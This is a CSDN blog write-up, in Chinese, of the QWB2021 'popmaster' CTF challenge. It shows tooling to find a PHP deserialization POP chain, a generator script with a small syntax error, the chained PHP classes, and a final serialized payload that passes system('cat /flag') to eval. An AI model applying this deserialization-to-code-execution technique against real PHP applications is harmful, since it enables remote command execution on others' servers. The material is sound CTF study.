[强网杯2021]XBUUCTF[QWB2021 Quals]popmaster复现记录

最新推荐文章于 2022-02-27 18:37:47 发布
最新推荐文章于 2022-02-27 18:37:47 发布
阅读量1.9k 收藏 5
点赞数 2
分类专栏: CTF 文章标签: php CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/shuaicenglou3032/article/details/120614548
版权

给自动化代码审计的大佬跪了。
出题人写的WP在这里:强网杯[pop_master]与[陀那多]赛题的出题记录
复现可以到BUUCTF,启动[QWB2021 Quals]popmaster这道题就ok。
按大佬的解法,首先要安装php-parser,把题目的代码转换成抽象语法树,实际上这道题就是一个图的可达路径搜索问题。
这里在kali安装一波php-parser:
1.wget https://getcomposer.org/installer
在这里插入图片描述
2.mv installer installer.php
3.php installer.php
在这里插入图片描述
出现这个说明前置要求的composer.phar安装成功,在当前目录下就会多出来一个叫composer.phar的东西
4.php composer.phar require nikic/php-parser
在这里插入图片描述
至此php-parser安装成功。
然后把大佬的EXP下下来,解压到当前目录中
然后将赛题中class.php的内容复制到本exp的code.php中。
然后将mian.php中的全局变量中的入口方法与入口参数名赋值
运行main.php:
在这里插入图片描述
成功找到一条pop链。

ZChdNQ======>dBIySo======>X0l7ws======>LyI1rT======>duxg5w======>D2VmWz======>w5pPNI======>x5cLyL======>Ga3P6G======>GVcxei======>Y4BK4w======>pYekV8======>hsrB5s======>kL7zby======>HbQCtF======>KXgmGS======>BVZEev======>Lutxdu======>TZMXmr======>xB56gm======>EfPQZq======>k1UgFG======>eval

写了一段python代码来生成php的poc:

# -*- coding: utf-8 -*-
#本代码运行在python2.7下
import linecache
classphp = "C:/Users/root/Desktop/class.php.txt"
f = open(classphp)               # 返回一个文件对象
line = f.readline()
linenum = 1
pop = "bqoNH6======>U3GR5Y======>yZ135Z======>PEmYsT======>xTOweR======>kdYRCK======>p9g5V9======>z2B2Yy======>zyPbQC======>GUFeql======>ZUMG5r======>H9G1mh======>XePAh8======>fpPqVg======>YNBWxQ======>tE6Eu5======>UhnEew======>pP2Nyq======>a2w5hk======>EYafpg======>YlEyzo======>l94Kwx======>eval"
poplist = pop.split("======>")
popstartindex = range(0,len(poplist)-1)
popendindex = range(0,len(poplist)-1)
while line:
    linenum+=1
    line = f.readline()
    for i in range(0,len(poplist)-1):
        if line.find(poplist[i])!=-1 and line.find("{")!=-1:
            for j in range(0,30):
                if linecache.getline(classphp, linenum-j).find("class") != -1 and linecache.getline(classphp, linenum-j).find("{")!=-1:
                    popstartindex[i] = linenum-j
                    break
            for j in range(0, 30):
                if linecache.getline(classphp, linenum + j).find("class") != -1 and linecache.getline(classphp, linenum+j).find("{") != -1:
                    popendindex[i] = linenum + j
                    break
            continue
f.close()
#生成php的exp
print("<?php")
for i in range(0,len(poplist)-1):
    for j in range(popstartindex[i],popendindex[i]):
        print(linecache.getline(classphp,j).replace("\n",""))
for i in range(0,len(poplist)-1):
    for j in range(popstartindex[i], popendindex[i]):
        if(linecache.getline(classphp,j).find("class")!=-1 and linecache.getline(classphp,j).find("{")!=-1):
            s = linecache.getline(classphp,j)
            s = s.replace("{","();")
            s = s.replace("class","new")
            s = s.replace("\n", "")
            print "$a"+str(i)+" = "+s
for i in range(0,len(poplist)-1):
    if(i < len(poplist)-1):
        for j in range(popstartindex[i], popendindex[i]):
            if (linecache.getline(classphp, j).find("public $") != -1):
                s = linecache.getline(classphp, j).replace("public $", "")
                s = s.replace(";", "")
                s = s.replace("    ", "")
                s = s.replace("\n", "")
                print("$a" + str(i) + "->" + s + "=" + "$a" + str(i + 1) + ";")
    else:
        print ("$a"+str(i)+"->"++"="+"$_POST['cmd']")

得到poc:

<?php
class L7UHD6{
    public $nHWOwmq;
    public function xbepUT($dV2ZO){
		if(45016>39692){
			$dV2ZO = $dV2ZO.'wHmK0';
		}
		if(method_exists($this->nHWOwmq, 'mAbmf6')) $this->nHWOwmq->mAbmf6($dV2ZO);
		if(method_exists($this->nHWOwmq, 'rcLD5G')) $this->nHWOwmq->rcLD5G($dV2ZO);

    }
    public function VTtOt1($gIpCX){
		for($i = 0; $i < 26; $i ++){
			$au0wPm= $gIpCX;
		}
		if(method_exists($this->nHWOwmq, 'Vf56w8')) $this->nHWOwmq->Vf56w8($gIpCX);
		if(method_exists($this->nHWOwmq, 'H71Z97')) $this->nHWOwmq->H71Z97($gIpCX);

    }
}


class YyaVmX{
    public $LBhGiW0;
    public function C7F7Xa($aAsyu){
		$aAsyu='LbsMN';
		eval($aAsyu);

    }
    public function mAbmf6($PTDrM){
		for($i = 0; $i < 23; $i ++){
			$aFkirt= $PTDrM;
		}
		$this->LBhGiW0->BHGNSG($PTDrM);

    }
}


class FPlBKG{
    public $YV1W3IV;
    public function yKpHBF($VC23m){
		for($i = 0; $i < 7; $i ++){
			$agyI1z= $VC23m;
		}
		if(method_exists($this->YV1W3IV, 'tumiOO')) $this->YV1W3IV->tumiOO($VC23m);
		if(method_exists($this->YV1W3IV, 'gguM56')) $this->YV1W3IV->gguM56($VC23m);

    }
    public function BHGNSG($AGPDQ){
		if(1366>45772){
			$AGPDQ = $AGPDQ.'XupC5';
		}
		$this->YV1W3IV->ITqWW2($AGPDQ);

    }
}


class kCZ5P4{
    public $SuxNbbP;
    public function lGVgt2($g7FMP){
		for($i = 0; $i < 3; $i ++){
			$g7FMP= $sFwFD;
		}
		eval($g7FMP);

    }
    public function ITqWW2($yukip){
		$this->UtURv = "X7Eg4";
		$this->SuxNbbP->oMvqkv($yukip);

    }
}


class fhGDEo{
    public $c8Un3Pc;
    public function GGs2Tx($waoG6){
		eval($waoG6);

    }
    public function oMvqkv($GeGy2){
		$this->cM4xY = "xIS1c";
		$this->c8Un3Pc->msMgDb($GeGy2);

    }
}


class qZgqTN{
    public $AanVLGe;
    public function msMgDb($hiIFc){
		$this->rlETt = "PxSDM";
		if(method_exists($this->AanVLGe, 'hZChcd')) $this->AanVLGe->hZChcd($hiIFc);
		if(method_exists($this->AanVLGe, 'v05w7c')) $this->AanVLGe->v05w7c($hiIFc);

    }
    public function dg8ecu($vkPSz){
		for($i = 0; $i < 3; $i ++){
			$aZTyWy= $vkPSz;
		}
		$this->AanVLGe->CNnFdI($vkPSz);

    }
}


class XyhYtb{
    public $xEGEy7K;
    public function hZChcd($S5KoL){
		$this->QlrMr = "UnRom";
		if(method_exists($this->xEGEy7K, 'x8iwgk')) $this->xEGEy7K->x8iwgk($S5KoL);
		if(method_exists($this->xEGEy7K, 'wkd2WW')) $this->xEGEy7K->wkd2WW($S5KoL);

    }
    public function WMtbwZ($ugsdY){
		$this->N4yEy = "UvvRN";
		eval($ugsdY);

    }
}


class suL25R{
    public $bz6H98l;
    public function x8iwgk($QrGk8){
		$this->XnLoL = "Xwudp";
		if(method_exists($this->bz6H98l, 'PcquZZ')) $this->bz6H98l->PcquZZ($QrGk8);
		if(method_exists($this->bz6H98l, 'sFGeyF')) $this->bz6H98l->sFGeyF($QrGk8);

    }
    public function FWq4lD($rqPwp){
		eval($rqPwp);

    }
}


class DLGUGZ{
    public $FwX8fKY;
    public function sFGeyF($XzG6P){
		for($i = 0; $i < 22; $i ++){
			$aiuTZa= $XzG6P;
		}
		$this->FwX8fKY->ti9YlF($XzG6P);

    }
    public function dm4bGP($gqoRh){
		for($i = 0; $i < 0; $i ++){
			$aCumW9= $gqoRh;
		}
		if(method_exists($this->FwX8fKY, 'akEghP')) $this->FwX8fKY->akEghP($gqoRh);
		if(method_exists($this->FwX8fKY, 'bPN2Nx')) $this->FwX8fKY->bPN2Nx($gqoRh);

    }
}


class A5SQm0{
    public $sfVD9z1;
    public function ti9YlF($wV3Ig){
		for($i = 0; $i < 1; $i ++){
			$aCHhiQ= $wV3Ig;
		}
		if(method_exists($this->sfVD9z1, 'tYwP6S')) $this->sfVD9z1->tYwP6S($wV3Ig);
		if(method_exists($this->sfVD9z1, 'kkWKI2')) $this->sfVD9z1->kkWKI2($wV3Ig);

    }
    public function EGyMsQ($sOzws){
		eval($sOzws);

    }
}


class HXf222{
    public $umxT6cV;
    public function kkWKI2($DpQYt){
		$this->bV86G = "qW8tN";
		if(method_exists($this->umxT6cV, 'RBXeSg')) $this->umxT6cV->RBXeSg($DpQYt);
		if(method_exists($this->umxT6cV, 'i0URsO')) $this->umxT6cV->i0URsO($DpQYt);

    }
    public function vdQxOo($XY7aa){
		for($i = 0; $i < 21; $i ++){
			$XY7aa= $Sl9Kd;
		}
		if(method_exists($this->umxT6cV, 'VmSVuq')) $this->umxT6cV->VmSVuq($XY7aa);
		if(method_exists($this->umxT6cV, 'GhFnwk')) $this->umxT6cV->GhFnwk($XY7aa);

    }
}


class gDnfK9{
    public $TxB0FdF;
    public function RBXeSg($bF4BC){
		$this->H3vLG = "v2w10";
		if(method_exists($this->TxB0FdF, 'zTkOnG')) $this->TxB0FdF->zTkOnG($bF4BC);
		if(method_exists($this->TxB0FdF, 'G0ioTK')) $this->TxB0FdF->G0ioTK($bF4BC);

    }
    public function oplEGY($QGyHC){
		$this->ypak3 = "HMUxr";
		if(method_exists($this->TxB0FdF, 'mIrTr2')) $this->TxB0FdF->mIrTr2($QGyHC);
		if(method_exists($this->TxB0FdF, 'EVAhi7')) $this->TxB0FdF->EVAhi7($QGyHC);

    }
}


class D8UAmt{
    public $izw1YVT;
    public function zTkOnG($vmaCD){
		$this->qv4A9 = "wW7ee";
		$this->izw1YVT->ODsdNW($vmaCD);

    }
    public function l6fzen($Iz4xl){
		$this->iyZkT = "BwaGt";
		$this->izw1YVT->dr6ybG($Iz4xl);

    }
}


class D8WX2Q{
    public $iiirsPe;
    public function ODsdNW($Rrp6q){
		for($i = 0; $i < 26; $i ++){
			$aOWEiN= $Rrp6q;
		}
		if(method_exists($this->iiirsPe, 'tYWHfI')) $this->iiirsPe->tYWHfI($Rrp6q);
		if(method_exists($this->iiirsPe, 'qtRRwg')) $this->iiirsPe->qtRRwg($Rrp6q);

    }
    public function khXStd($xx5AI){
		for($i = 0; $i < 24; $i ++){
			$atgh0U= $xx5AI;
		}
		if(method_exists($this->iiirsPe, 'gCBRhG')) $this->iiirsPe->gCBRhG($xx5AI);
		if(method_exists($this->iiirsPe, 'K9YqDl')) $this->iiirsPe->K9YqDl($xx5AI);

    }
}


class EVAmyn{
    public $mUISnWb;
    public function yvGxsq($G9hkX){
		$this->ZR23N = "GvYES";
		if(method_exists($this->mUISnWb, 'ssR1IV')) $this->mUISnWb->ssR1IV($G9hkX);
		if(method_exists($this->mUISnWb, 'wFmoAx')) $this->mUISnWb->wFmoAx($G9hkX);

    }
    public function tYWHfI($yN6Eu){
		if(52033>2482){
			$yN6Eu = $yN6Eu.'SGu6E';
		}
		if(method_exists($this->mUISnWb, 'x43ZTL')) $this->mUISnWb->x43ZTL($yN6Eu);
		if(method_exists($this->mUISnWb, 'dQMl9g')) $this->mUISnWb->dQMl9g($yN6Eu);

    }
}


class cDuVyQ{
    public $VLDgIsu;
    public function x43ZTL($SHUc7){
		for($i = 0; $i < 30; $i ++){
			$asUMta= $SHUc7;
		}
		if(method_exists($this->VLDgIsu, 'ebiPNb')) $this->VLDgIsu->ebiPNb($SHUc7);
		if(method_exists($this->VLDgIsu, 'BGYfdR')) $this->VLDgIsu->BGYfdR($SHUc7);

    }
    public function IP5InO($OitLV){
		$OitLV='ui9fy';
		eval($OitLV);

    }
}


class vD3i0B{
    public $ga4GK57;
    public function uUiXD0($iuWYO){
		if(3909>32143){
			$iuWYO = $iuWYO.'FUVHe';
		}
		$this->ga4GK57->sW3R98($iuWYO);

    }
    public function ebiPNb($hwCNG){
		$this->pzzE8 = "Hlx2G";
		$this->ga4GK57->gSBlTm($hwCNG);

    }
}

class N2Dy79{
    public $ReDc2ZH;
    public function gSBlTm($gFNi2){
		$this->SSi7T = "Tmb28";
		if(method_exists($this->ReDc2ZH, 'ayZmI3')) $this->ReDc2ZH->ayZmI3($gFNi2);
		if(method_exists($this->ReDc2ZH, 'PdKLEU')) $this->ReDc2ZH->PdKLEU($gFNi2);

    }
    public function zpKlgI($l9lUk){
		$this->FDN9G = "wqgFa";
		if(method_exists($this->ReDc2ZH, 'tIYgva')) $this->ReDc2ZH->tIYgva($l9lUk);
		if(method_exists($this->ReDc2ZH, 'pH3TWQ')) $this->ReDc2ZH->pH3TWQ($l9lUk);

    }
}


class az2d5x{
    public $aaSROLe;
    public function ayZmI3($KVfRN){
		if(12818>22299){
			$KVfRN = $KVfRN.'xoTGc';
		}
		$this->aaSROLe->UUqav0($KVfRN);

    }
    public function tYRTEy($egmfS){
		for($i = 0; $i < 15; $i ++){
			$aQKoAF= $egmfS;
		}
		$this->aaSROLe->BnYLZl($egmfS);

    }
}


class d0UxDv{
    public $wkvASs6;
    public function SxOyYw($EgxFz){
		$this->KXDQF = "WP7QA";
		eval($EgxFz);

    }
    public function UUqav0($s1mew){
		if(52050>20186){
			$s1mew = $s1mew.'RgmkC';
		}
		$this->wkvASs6->TbGxG5($s1mew);

    }
}
class HclckR{
    public $QIlLvkK;
    public function cLHWvn($eEipn){
		if(24817>22370){
			$eEipn = $eEipn.'cc1eG';
		}
		$this->QIlLvkK->PiLK0i($eEipn);
    }
    public function TbGxG5($YcxIx){
		for($i = 0; $i < 10; $i ++){
			$aTNhpa= $YcxIx;
		}
		$this->QIlLvkK->F5UkVr($YcxIx);
    }
}
class gp2b2g{
    public $xv9AHCl;
    public function nOVnqx($lgspc){
		$this->gggqP = "rMyHa";
		$this->xv9AHCl->ACCxak($lgspc);

    }
    public function F5UkVr($h9lGB){
		for($i = 0; $i < 36; $i ++){
			$aPITGf= $h9lGB;
		}
		$this->xv9AHCl->htVHuV($h9lGB);
    }
}
class OOxBSs{
    public $xt66alQ;
    public function gwz5Lo($bhyKR){
		if(30529>49808){
			$bhyKR = $bhyKR.'hTHz9';
		}
		$this->xt66alQ->cH2bOt($bhyKR);
    }
    public function htVHuV($VpGQd){
		if(63158>2952){
			$VpGQd = $VpGQd.'QkEie';
		}
		if(method_exists($this->xt66alQ, 'C38qDA')) $this->xt66alQ->C38qDA($VpGQd);
		if(method_exists($this->xt66alQ, 'a0YLHW')) $this->xt66alQ->a0YLHW($VpGQd);

    }
}
class OseZYk{
    public $BWu6mc5;
    public function LtGuap($qrXpU){
		eval($qrXpU);

    }
    public function C38qDA($xbly4){
		if(20950>43181){
			$xbly4 = $xbly4.'nEdmR';
		}
		eval($xbly4);
    }
}
$a0 = new L7UHD6();
$a1 = new YyaVmX();
$a2 = new FPlBKG();
$a3 = new kCZ5P4();
$a4 = new fhGDEo();
$a5 = new qZgqTN();
$a6 = new XyhYtb();
$a7 = new suL25R();
$a8 = new DLGUGZ();
$a9 = new A5SQm0();
$a10 = new HXf222();
$a11 = new gDnfK9();
$a12 = new D8UAmt();
$a13 = new D8WX2Q();
$a14 = new EVAmyn();
$a15 = new cDuVyQ();
$a16 = new vD3i0B();
$a17 = new N2Dy79();
$a18 = new az2d5x();
$a19 = new d0UxDv();
$a20 = new HclckR();
$a21 = new gp2b2g();
$a22 = new OOxBSs();
$a23 = new OseZYk();
$a0->nHWOwmq=$a1;
$a1->LBhGiW0=$a2;
$a2->YV1W3IV=$a3;
$a3->SuxNbbP=$a4;
$a4->c8Un3Pc=$a5;
$a5->AanVLGe=$a6;
$a6->xEGEy7K=$a7;
$a7->bz6H98l=$a8;
$a8->FwX8fKY=$a9;
$a9->sfVD9z1=$a10;
$a10->umxT6cV=$a11;
$a11->TxB0FdF=$a12;
$a12->izw1YVT=$a13;
$a13->iiirsPe=$a14;
$a14->mUISnWb=$a15;
$a15->VLDgIsu=$a16;
$a16->ga4GK57=$a17;
$a17->ReDc2ZH=$a18;
$a18->aaSROLe=$a19;
$a19->wkvASs6=$a20;
$a20->QIlLvkK=$a21;
$a21->xv9AHCl=$a22;
$a22->xt66alQ=$a23;

然而根据该poc生成的EXP报错了:
在这里插入图片描述
在本地调试之后发现是因为代码中有一些类添加了永真条件下对eval参数添加后缀导致eval执行失败:
在这里插入图片描述
所以这里尝试在后面加一个注释符//把后面的字符串注释掉:
最终EXP:

?pop=O%3A6%3A%22L7UHD6%22%3A1%3A%7Bs%3A7%3A%22nHWOwmq%22%3BO%3A6%3A%22YyaVmX%22%3A1%3A%7Bs%3A7%3A%22LBhGiW0%22%3BO%3A6%3A%22FPlBKG%22%3A1%3A%7Bs%3A7%3A%22YV1W3IV%22%3BO%3A6%3A%22kCZ5P4%22%3A1%3A%7Bs%3A7%3A%22SuxNbbP%22%3BO%3A6%3A%22fhGDEo%22%3A1%3A%7Bs%3A7%3A%22c8Un3Pc%22%3BO%3A6%3A%22qZgqTN%22%3A1%3A%7Bs%3A7%3A%22AanVLGe%22%3BO%3A6%3A%22XyhYtb%22%3A1%3A%7Bs%3A7%3A%22xEGEy7K%22%3BO%3A6%3A%22suL25R%22%3A1%3A%7Bs%3A7%3A%22bz6H98l%22%3BO%3A6%3A%22DLGUGZ%22%3A1%3A%7Bs%3A7%3A%22FwX8fKY%22%3BO%3A6%3A%22A5SQm0%22%3A1%3A%7Bs%3A7%3A%22sfVD9z1%22%3BO%3A6%3A%22HXf222%22%3A1%3A%7Bs%3A7%3A%22umxT6cV%22%3BO%3A6%3A%22gDnfK9%22%3A1%3A%7Bs%3A7%3A%22TxB0FdF%22%3BO%3A6%3A%22D8UAmt%22%3A1%3A%7Bs%3A7%3A%22izw1YVT%22%3BO%3A6%3A%22D8WX2Q%22%3A1%3A%7Bs%3A7%3A%22iiirsPe%22%3BO%3A6%3A%22EVAmyn%22%3A1%3A%7Bs%3A7%3A%22mUISnWb%22%3BO%3A6%3A%22cDuVyQ%22%3A1%3A%7Bs%3A7%3A%22VLDgIsu%22%3BO%3A6%3A%22vD3i0B%22%3A1%3A%7Bs%3A7%3A%22ga4GK57%22%3BO%3A6%3A%22N2Dy79%22%3A1%3A%7Bs%3A7%3A%22ReDc2ZH%22%3BO%3A6%3A%22az2d5x%22%3A1%3A%7Bs%3A7%3A%22aaSROLe%22%3BO%3A6%3A%22d0UxDv%22%3A1%3A%7Bs%3A7%3A%22wkvASs6%22%3BO%3A6%3A%22HclckR%22%3A1%3A%7Bs%3A7%3A%22QIlLvkK%22%3BO%3A6%3A%22gp2b2g%22%3A1%3A%7Bs%3A7%3A%22xv9AHCl%22%3BO%3A6%3A%22OOxBSs%22%3A1%3A%7Bs%3A7%3A%22xt66alQ%22%3BO%3A6%3A%22OseZYk%22%3A1%3A%7Bs%3A7%3A%22BWu6mc5%22%3BN%3B%7D%7D%7D%7D%7D%7D%7D%7D%7D%7D%7D%7D%7D%7D%7D%7D%7D%7D%7D%7D%7D%7D%7D%7D&argv=system("cat /flag");//

拿到flag:
在这里插入图片描述

KogRow
关注
  • 2
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
oracle经典教程
11-04
有利于初学者很好的掌握oracle,是本好的教材
[QWB2021 Quals]陀那多/托纳多
weixin_43610673的博客
06-19 1695
参考guoke师傅的wp:https://guokeya.github.io/post/SZkQ4b1G/ 出题人思路:https://www.anquanke.com/post/id/244153#h2-4 参照上面链接的两篇文章大致梳理下知识点和思路。 在buu上做了一个,但buu上的环境不知道是改了啥,sql注入出密码之后,登录那一直提示不是admin用户,导致后面无法读文件。还以为是注入得到的账户密码有问题,瞎折腾了半天。 没有登录的话会被直接重定向。 这题开始为一个登录框,注入点在regis
BUUCTF-模板注入专项刷题
m0_51563147的博客
02-27 3375
SSTI: 目录 简单 [CSCCTF 2019 Qual]FlaskLight 签到 [BJDCTF2020]Cookie is so stable twig模板注入 [WesternCTF2018]shrine 想方设法获取config [CISCN2019 华东南赛区]Web11 smarty模板注入 [BJDCTF2020]The mystery of ip [GYCTF2020]FlaskApp debug模式一定条件下可以窃取出来pin码命令执行,但是题目过滤的不够严格导致.
强网杯2021 pop-master
azraelxuemo的博客
08-12 368
这个题目比较好的思路是写静态分析利用代码 当然这个题目可能混淆不是很多,所以利用起来稍微方便一点,可以参考如下代码 首先下载pop代码保存为class.php 保存下面php静态分析代码为filter.php.需要修改你本地的autoload.php位置和entryFunc的内容 <?php ini_set('max_execution_time', '300'); require 'D:\phpstudy_pro\Extensions\php\php8.0.2nts\ext\vendor\autol
Jarvis OJ web wp
Wei_xino的博客
10-11 230
写在前面:自己再理顺一遍思路,回头习时看看自己还懂不懂这个知识点 babyphp about页面,有PHP,GIT和Bootstrap,联想到会不会GIT源码泄露,用githack操作,python2 GitHack xxxxx/.git/,得到源码 if (isset($_GET['page'])) { $page = $_GET['page']; } else { $page = "ho...
Matplotlib.zip_QWB_dssz_matplotlib
07-14
Matplotlib的官方文档,开发必备,强烈推荐
CTF
03-10
周大福 麒麟在CTF游戏中的写作。
网页开发迷你工具
09-07
"截取屏幕"功能则能够帮助用户快速捕捉电脑屏幕上的任何区域,并可以方便地保存或分享截图,这对于记录问题、演示操作或者创建教程非常有用。此外,部分高级的截图工具还支持标注和编辑功能,便于指出问题所在或者...
AB系列eplan宏文件(变频器、io、控制器所有的)
04-21
AB系列的EPLAN宏文件是电气工程设计领域中不可或缺的工具,主要用于自动化系统的设计和配置。EPLAN是一款高效、智能化的电气CAD软件,而宏文件则包含了一系列预先设定的符号、模板和规则,用于简化和标准化设计过程...
AB PLC 2080手册
10-23
AB PLC 2080手册 安装说明 选型说明 MICRO820 以太网 串口
基于matlab的m序列的相关性仿真分析
11-11
而`qwb20172204066.m`和`qwb1.slx`、`qwb.slx`可能是进一步的M序列相关性分析代码或Simulink模型,它们可能包括了序列生成、相关性计算以及最终的图形化展示。 在MATLAB中,可以使用`corrcoef`函数来计算序列的相关...
[『辅助』] 易编远航第一期-六套大漠多线程中级进阶视频教程
09-20
使用同步器作为多线程中级教材,主要是对上一套初级教程做一个简单的总结, 并且对接下来脚本的线程处理,及监控线程起到一个较高的实际认知。 对多线程基 础及后续多线程课程有承前启后的作用 ...
C# 自制的系统个性化小程序
01-30
下载链接: 蓝奏云:https://gfdgdxi.lanzous.com/b01nzabpg,密码...百度网盘:https://pan.baidu.com/s/1TnKvPMQAVugqwyhZm-zttQ,提取码:qwb3 Gitee:https://gitee.com/gfdgd-xi/utility---windows-csharp-version
显示/光电技术中的安华推出业内第一款0.5W高功率LED产品
12-06
内容部分进一步详细介绍了Avago的0.5W ASMT-QWB2(白色光)和ASMT-QxB2(琥珀、红橘、红色光)系列,它们可广泛应用于汽车内部和外部照明,如仪表板背光、室内灯、地图灯、踏板灯、倒车指示灯和车牌照明等。...
显示/光电技术中的安华高PLCC-4表面贴装LED具备0.5W高功率
12-06
具体到汽车应用,Avago的0.5W ASMT-QWB2(白色光)和ASMT-QxB2(琥珀、红橘与红色光)系列LED可广泛用于仪表板背光、车厢内部照明、地图灯、脚踏板照明、倒车指示灯和车牌照明等。在非汽车领域,它们也可作为通用...
[网络安全提高篇] 一一〇.强网杯CTF的Web Write-Up(上) 寻宝、赌徒、EasyWeb、pop_master
热门推荐
杨秀璋的专栏
06-15 3万+
强网杯作为国内最好的CTF比赛之一,搞安全的博友和初学者都可以去尝试下。整体而言,比赛题目的水准仍然非常高,尤其是RE和PWN,包括Web,所以还是有很多知识点值得我们学习的。最后,非常感谢参考文献的大佬们,尤其是Nu1L战队(推荐VX关注他们),也感谢许多参加比赛的伙伴和博友们。如果您是一名安全初学者,不妨多参加比赛,每一次CTF比赛都能让我们学到很多东西,即使是赛后的WP,也能成长不少。同时有个遗憾,比赛完后题目不能打开,将就看吧。
栈的pop
qiaoguangtong的博客
06-03 6765
整数栈的弹出练习
第五届强网杯某些wp
克格莫
06-14 617
F12提示得到源码: const salt = random('Aa0', 40); const HashCheck = sha256(sha256(salt + 'admin')).toString(); let filter = (data) => { let blackwords = ['alter', 'insert', 'drop', 'delete', 'update', 'convert', 'chr', 'char', 'concat', 'reg', 'to', 'qu
2021强网杯wp
灰太的表格的博客
06-15 2009
(这次比赛做出的四个web总结下。赛后过的两天才写的wp的有好多可能没记录到,自己还比较菜,师傅们轻点喷。。) 赌徒 寻宝 pop_master easyweb 赌徒 打开提示/etc/hint文件。源码泄露有web.zip <meta charset="utf-8"> <?php //hint is in hint.php error_reporting(1); class Start { public $name='guest'; public $flag='sys
Micro830 10点编程控制器安装详解及安全指南
本篇文档是关于Micro830™10点可编程控制器的安装指南,针对的是产品目录号2080-LC30-10QWB和2080-LC30-10QVB。该控制器是Rockwell Automation公司生产的,适用于工业自动化控制场景,提供了多语言版本,包括法语、...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值